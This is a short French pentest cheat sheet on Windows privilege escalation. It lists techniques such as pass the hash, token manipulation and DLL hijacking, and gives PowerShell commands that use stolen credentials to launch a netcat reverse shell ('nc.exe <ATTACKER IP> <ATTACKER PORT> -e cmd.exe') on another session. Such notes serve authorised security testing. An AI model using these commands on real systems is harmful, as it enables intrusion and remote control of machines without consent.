Elévation de privilège

Méthodologie

• Patchs absents
• Identifiants stockés (Navigateurs, DPAPI, etc.)
• Pass the hash
• GPP
• Manipulation de token
• Secondary Logon
• Chemin de service non quoté
• Permission de registre non sécurisé
• Intel SYSRET
• Always Install Elevated
• Injection de DLL
• Hijacking de DLL
• Weak/Insecure service permission
• Insecure file/folder permission
• Groupe par défault vulnérables (The Hacker recipes)

Win-RM local

Monter un reverse shell sur une autre session:

$securePassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential '<USERNAME>', $securePassword
Invoke-command -ComputerName <COMPUTER NAME> -Credential $credential -ScripBlock { <PATH TO NC.exe> <ATTACKER IP> <ATTACKER PORT> -e cmd.exe }

Obtenir un shell sur une autre session:

$securePassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential '<USERNAME>', $securePassword
enter-pssession -Computer <COMPUTER NAME> -Credential $credential

RunasCS

RunasCS permet d’obtenir les fonctionnalités de la commande native runas.exe mais tout en contournant quelques limitations.

• https://github.com/antonioCoco/RunasCs

Ressources :

• https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/